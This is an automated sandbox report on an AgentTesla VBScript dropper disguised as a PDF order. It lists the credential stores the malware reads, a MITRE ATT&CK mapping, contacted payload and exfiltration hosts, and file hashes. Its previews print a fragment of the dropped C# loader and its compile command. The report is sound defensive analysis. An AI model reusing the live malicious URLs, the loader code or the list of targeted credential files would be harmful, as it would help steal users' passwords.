Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match

File source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match

File source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_00EF44F2 bind,		17_2_00EF44F2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_00EF44CD bind,		17_2_00EF44CD

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Exfiltration Over Alternative Protocol	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	421 Scripting	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	115 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	21 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	421 Scripting	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	231 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	231 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 System Network Configuration Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	11 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ordine n.47201 pdf.vbs	0%	ReversingLabs
Ordine n.47201 pdf.vbs	0%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
api.ipify.org.herokudns.com	0%	Virustotal		Browse
ftp.mcmprint.net	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://qwedft.gq/Akkant/bwqPIdZhEA125.psm	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org.herokudns.com	52.20.78.240	true	false	0%, Virustotal, Browse	unknown
qwedft.gq	162.240.62.179	true	false		unknown
ftp.mcmprint.net	185.31.121.136	true	true	10%, Virustotal, Browse	unknown
api.ipify.org	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://qwedft.gq/Akkant/bwqPIdZhEA125.psm	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.240.62.179	qwedft.gq	United States	46606	UNIFIEDLAYER-AS-1US	false
52.20.78.240	api.ipify.org.herokudns.com	United States	14618	AMAZON-AESUS	false
185.31.121.136	ftp.mcmprint.net	Bulgaria	199364	RAX-ASBG	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	755275
Start date and time:	2022-11-28 14:49:15 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Ordine n.47201 pdf.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
EGA Information:	Successful, ratio: 50%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 310 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .vbs Override analysis time to 240s for JS files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com
Execution Graph export aborted for target powershell.exe, PID 5864 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:51:11	API Interceptor	26x Sleep call for process: powershell.exe modified
14:53:16	API Interceptor	510x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.240.62.179	Richiesta urgente.vbs	Get hash	malicious	Browse	qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi
52.20.78.240	hJ7aWr8Et2.exe	Get hash	malicious	Browse	api.ipify.org/?format=exe
	SecuriteInfo.com.Malicious_Behavior.SB.29614.19372.exe	Get hash	malicious	Browse	api.ipify.org/
	swift copy 016011 022.exe	Get hash	malicious	Browse	api.ipify.org/
	7wAieAv6gR.exe	Get hash	malicious	Browse	api.ipify.org/
	9zOTVIFu5T.exe	Get hash	malicious	Browse	api.ipify.org/?format=txt
	DtDo5rjAsP.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	K24WHaP1Ki.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	SecuriteInfo.com.HEUR.Trojan.Win32.Guloader.gen.29987.exe	Get hash	malicious	Browse	api.ipify.org/
	RIP_YOUR_PC_LOL.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	DuThJ88QX1.exe	Get hash	malicious	Browse	api.ipify.org/
	47ee7c873ff6ad620d68f6bd92cbd41ae0194c446720228f805f3487192dd909.exe	Get hash	malicious	Browse	api.ipify.org/
	075BF8BFF27D626CA111B3CA9603F6C0D1E3C1D2F3ECD.exe	Get hash	malicious	Browse	api.ipify.org/
	yDqEvzDn2m.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	iff.bin.dll	Get hash	malicious	Browse	api.ipify.org/
	0318_45657944978421.doc	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.Heur.28256.doc	Get hash	malicious	Browse	api.ipify.org/
	2HFJezUWHA.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	QZLQkiS4nj.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	SQCchgRsrh.doc	Get hash	malicious	Browse	api.ipify.org/
	iff.dll	Get hash	malicious	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.ipify.org.herokudns.com	094089010-094098574-1669343495-1669343493-2332.html	Get hash	malicious	Browse	52.20.78.240
	INV and NOA.exe	Get hash	malicious	Browse	54.91.59.199
	ORDERFT-PO-0276-22 & PO pdf.exe	Get hash	malicious	Browse	3.220.57.224
	SAP_RFQ-22-QAI-OPS-0067.Docx.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.PWSX-gen.543.5711.exe	Get hash	malicious	Browse	3.232.242.170
	PO-IB5708.exe	Get hash	malicious	Browse	3.232.242.170
	FedEx Express AWB#53053232097Receipt.exe	Get hash	malicious	Browse	54.91.59.199
	094089010-094098574-1669343495-1669343493-2332.html	Get hash	malicious	Browse	54.91.59.199
	VHE220012A.exe	Get hash	malicious	Browse	52.20.78.240
	#U0e02#U0e2d#U0e43#U0e1a#U0e40#U0e2a#U0e19#U0e2d#U0e23#U0e32#U0e04#U0e32.exe	Get hash	malicious	Browse	3.232.242.170
	swYA5v1F5o.exe	Get hash	malicious	Browse	3.220.57.224
	DHLDOCUMENTS27011222.exe	Get hash	malicious	Browse	3.220.57.224
	Y06bwSO4Jy.exe	Get hash	malicious	Browse	3.232.242.170
	Halkbank.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.PWSX-gen.8427.25662.exe	Get hash	malicious	Browse	52.20.78.240
	file.exe	Get hash	malicious	Browse	3.232.242.170
	SecuriteInfo.com.W64.Agent.FIC.gen.Eldorado.1956.16034.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.W64.Agent.FIC.gen.Eldorado.14198.17336.exe	Get hash	malicious	Browse	3.232.242.170
	Board CallQ4.html	Get hash	malicious	Browse	54.91.59.199
	SecuriteInfo.com.Win32.Malware-gen.3648.30859.exe	Get hash	malicious	Browse	3.220.57.224

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	SHIPPING DOC.exe	Get hash	malicious	Browse	50.87.139.143
	RFQ 8525-22.exe	Get hash	malicious	Browse	192.185.90.105
	https://mail.jaytellis.com/blog/?i=i&0=dgss@seg-social.pt	Get hash	malicious	Browse	192.254.190.158
	NEW PURCHASE ORDER_PDF.exe	Get hash	malicious	Browse	162.241.194.178
	Richiesta urgente.vbs	Get hash	malicious	Browse	162.240.62.179
	Lakeringernes (1).exe	Get hash	malicious	Browse	50.87.192.144
	Vendor Master form.exe	Get hash	malicious	Browse	50.87.139.143
	Urgent quote request -pdf-.js	Get hash	malicious	Browse	162.241.123.11
	9umWLvLL9p.exe	Get hash	malicious	Browse	50.87.249.47
	bfBERETDmj.exe	Get hash	malicious	Browse	108.167.143.196
	pX2iKwDkVe.exe	Get hash	malicious	Browse	192.185.150.20
	SecuriteInfo.com.Win32.PWSX-gen.24831.19780.exe	Get hash	malicious	Browse	192.185.48.122
	boat.x86.elf	Get hash	malicious	Browse	74.91.232.63
	Estado de cuenta.xls	Get hash	malicious	Browse	192.185.113.96
	H32Mnb3sB8.exe	Get hash	malicious	Browse	192.185.150.20
	41052D6A6B62BDA012DBFD2C47B00943BFE395745917E.exe	Get hash	malicious	Browse	192.185.104.204
	https://t.co/EZE5v2LOAz	Get hash	malicious	Browse	192.185.48.170
	G6BLxYuvUq.exe	Get hash	malicious	Browse	108.167.143.196
	FGBX7XkY6M.exe	Get hash	malicious	Browse	108.167.143.196
	ayy8sj4Csb.exe	Get hash	malicious	Browse	108.167.143.196
AMAZON-AESUS	Mddos.arm7.elf	Get hash	malicious	Browse	44.201.61.247
	https://zpr.io/3C7L92FR2mkt	Get hash	malicious	Browse	52.6.99.193
	094089010-094098574-1669343495-1669343493-2332.html	Get hash	malicious	Browse	52.20.78.240
	INV and NOA.exe	Get hash	malicious	Browse	52.20.78.240
	ORDERFT-PO-0276-22 & PO pdf.exe	Get hash	malicious	Browse	52.20.78.240
	SAP_RFQ-22-QAI-OPS-0067.Docx.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.PWSX-gen.543.5711.exe	Get hash	malicious	Browse	3.232.242.170
	PO-IB5708.exe	Get hash	malicious	Browse	3.232.242.170
	FedEx Express AWB#53053232097Receipt.exe	Get hash	malicious	Browse	54.91.59.199
	094089010-094098574-1669343495-1669343493-2332.html	Get hash	malicious	Browse	54.91.59.199
	VHE220012A.exe	Get hash	malicious	Browse	52.20.78.240
	https://service.roccasoluciones.com/	Get hash	malicious	Browse	52.202.168.65
	#U0e02#U0e2d#U0e43#U0e1a#U0e40#U0e2a#U0e19#U0e2d#U0e23#U0e32#U0e04#U0e32.exe	Get hash	malicious	Browse	3.232.242.170
	swYA5v1F5o.exe	Get hash	malicious	Browse	3.220.57.224
	DHLDOCUMENTS27011222.exe	Get hash	malicious	Browse	3.220.57.224
	Y06bwSO4Jy.exe	Get hash	malicious	Browse	3.220.57.224
	Halkbank.exe	Get hash	malicious	Browse	52.20.78.240
	https://form.questionscout.com/637f99ef2b4b9a9367c2f19c	Get hash	malicious	Browse	34.235.52.138
	kH7E1Hh6Kn.elf	Get hash	malicious	Browse	44.207.189.24
	7O5BExKIeE.elf	Get hash	malicious	Browse	34.225.41.132

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	vbc.exe	Get hash	malicious	Browse	52.20.78.240
	Ransomware.exe	Get hash	malicious	Browse	52.20.78.240
	INV and NOA.exe	Get hash	malicious	Browse	52.20.78.240
	ORDERFT-PO-0276-22 & PO pdf.exe	Get hash	malicious	Browse	52.20.78.240
	SAP_RFQ-22-QAI-OPS-0067.Docx.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.PWSX-gen.543.5711.exe	Get hash	malicious	Browse	52.20.78.240
	INVOICE SHIPPING-PACKING LIST.exe	Get hash	malicious	Browse	52.20.78.240
	PO-IB5708.exe	Get hash	malicious	Browse	52.20.78.240
	FedEx Express AWB#53053232097Receipt.exe	Get hash	malicious	Browse	52.20.78.240
	SHIPPING INVOICE-PACKING LIST DOCS.exe	Get hash	malicious	Browse	52.20.78.240
	IMG_202202811-0443.vbs	Get hash	malicious	Browse	52.20.78.240
	VHE220012A.exe	Get hash	malicious	Browse	52.20.78.240
	#U0e02#U0e2d#U0e43#U0e1a#U0e40#U0e2a#U0e19#U0e2d#U0e23#U0e32#U0e04#U0e32.exe	Get hash	malicious	Browse	52.20.78.240
	hesaphareketi-01.exe	Get hash	malicious	Browse	52.20.78.240
	DHLDOCUMENTS27011222.exe	Get hash	malicious	Browse	52.20.78.240
	Invoice-9273923.xll	Get hash	malicious	Browse	52.20.78.240
	Y06bwSO4Jy.exe	Get hash	malicious	Browse	52.20.78.240
	HaMUnoZrgN.exe	Get hash	malicious	Browse	52.20.78.240
	Halkbank.exe	Get hash	malicious	Browse	52.20.78.240
	Ziraat-bankasiSwiftMessaji2811202245678765.exe	Get hash	malicious	Browse	52.20.78.240

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.839308921501875
Encrypted:	false
SSDEEP:	192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
MD5:	937C6E940577634844311E349BD4614D
SHA1:	379440E933201CD3E6E6BF9B0E61B7663693195F
SHA-256:	30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
SHA-512:	6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
Malicious:	false
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\RESEEA4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Mon Nov 28 22:51:21 2022, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1332
Entropy (8bit):	3.993205850947984
Encrypted:	false
SSDEEP:	24:HIhzW9/YvcvzZHlYhKPfII+ycuZhNuwakS51PNnq92d:dnzZUKPg1uluwa35vq9G
MD5:	5216863F480F7882AFAEB89499228D62
SHA1:	2FB2EE5648BD1299BB19C290959389D28E949E64
SHA-256:	E72C9C28195AEE60FF6D5C4A7A7BAC75E2BCDE090DB1809D056A4593BE620267
SHA-512:	E10835EA13C09419A91B594414851DE24475C52351F2F332AB4F712E9E3888D141E90C28AEE3D86561AC8CDCA62732275DA225A3DCA92EAF739A5A63BD419AED
Malicious:	false
Preview:	L...i;.c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........V....c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP..................3.vX\pf5.D.W%.4..........7.......C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.o.n.t.x.z.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajtz5gna.zoe.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cooiigyo.4mo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.097050408210201
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryduwak7Ynqq2u1PN5Dlq5J:+RI+ycuZhNuwakS51PNnqX
MD5:	DA33A376585C706635F644DB5725B434
SHA1:	272B23AC808ED82681252C631879A4DCD6EEE31F
SHA-256:	2575D68B16ABBC5375AA45E18277CE15325F90F1169E3426B8DB3EBDD8723C4A
SHA-512:	9AB011BF6BF4CD87C7BDF2017DCE89F539DB31C9F8923B10607B21BE4F9FB6713904D49905D4E524B4A8A139838D6E5F81B8621EB886BB79FFAF9004A3B15780
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.o.n.t.x.z.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.3.o.n.t.x.z.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (1160), with no line terminators
Category:	dropped
Size (bytes):	1163
Entropy (8bit):	4.896337045995905
Encrypted:	false
SSDEEP:	24:JVSkaft8Qnl+BtwLzZTfgK9ZJqCNBFToLFxYBZ+dU6C5MnH:JVhafSQl+QRToK9ZJJNBFUBSZ+dUr5MH
MD5:	54C8D9DE5C308B3B41EFB88461C28598
SHA1:	555180A90D78546DF302FFB4C53F4E4290380D96
SHA-256:	E4E7463629553F5D62C18DD2FAB65BE93EBDF404C5663C189EE07FB6D4AC7C75
SHA-512:	206D0F4A95FB8D038DDD773E39F5D57AF3F603895A23E2E7D36DFC782DF8B9C4B9ED4508F4DF6CF28566967C902031E35807F28C512D7AB652355A3312E60DD1
Malicious:	false
Preview:	.using System;using System.Runtime.InteropServices;public static class Stueorglers1 {[DllImport("winspool.drv")]public static extern int PrinterMessageBox(int Stabl,int delagt,int Cro,int Rivul,int Tropic,int Skitse);[DllImport("ADVAPI32.DLL")]public static extern int RegQueryInfoKey(int Potten,int Teleol,int Plur,int Fusion,int sal,int Sau,int kalk,int Wee,int Godk,int Synan,int Pea,int Birk);[DllImport("kernel32")]public static extern int DuplicateHandle(int Hje,int Meetin,int Unor,int exac,int Over,int Biomec,int Silu);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("user32")]public static extern int GetProp(int Egy,int Sha);[DllImport("user32")]public static extern int CreateCursor(int Mell,int Rrl,int Flyg,int fastl,int Baan111,int Pseu,int Quaker);[DllImport("advapi32")]public static extern int SetServiceBits(int Gar,int Tenon,int Desp,int Explat);[DllImport("gdi32")]public static extern int GetClipRgn(int Rula,int Likv104);[

C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
Category:	dropped
Size (bytes):	377
Entropy (8bit):	5.224013965503116
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fzEQUzxs7+AEszIcNwi23fzEQmA:p37Lvkmb6KwZYQUWZEJZYQR
MD5:	C0FA1452EA401B9C3DD58DFBF90FF905
SHA1:	E7176041207188F5EC74B233BFBAA95B62B5A62D
SHA-256:	BA134CBB89F5E901CADCFDBE2D741891736B9C52E09DB2751D7CB755C0141E91
SHA-512:	BA1CB0B87C7F5822AA3C760667924A6E44F6262F51D75AA350AA065FD0552B277AC37B1750742AD2E0FC7D4A7A9F32C5A8CFF693DD2254330D9A5D439FAB8591
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.0.cs"

C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.2841703403897786
Encrypted:	false
SSDEEP:	48:6MkG51Mp2p9iSk+A6s9hvS3C6OFTre1uluwa35vq:KG51njiSk+N3MZwwK5
MD5:	472A0CEAFAC864C213CE8B1A44A72F2D
SHA1:	9A6DCCDD9D6806F11AB079E1CC65DF964D4DC19A
SHA-256:	8EAF0C298EEAC82C604082157141D067E96B6C6B0B5E895BF5D15AF9959EA385
SHA-512:	B1142E011A380227B8019B22637F04A436138C7473DF91549469B6DFB2E33AD2B3AD685159FDF960C42F659E8D0567F88DDA6DB6AFE65CD72203F595FB82EDBC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i;.c...........!.................'... ...@....... ....................................@..................................&..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......P ..h...........................................................BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID.......\|...#Blob...........G.........%3....................0.......................................4.-...............G.(.................................... ;............ M............ ].$.......... m./.......... z.7.......... ..$. ........ ../.'........ ..7.+........ ..7.-........ ..=./...............................

C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
Category:	modified
Size (bytes):	872
Entropy (8bit):	5.312266178218381
Encrypted:	false
SSDEEP:	24:Aqd3ka6KgYKEvYVKaM5DqBVKVrdFAMBJTH:Aika67rEvWKxDcVKdBJj
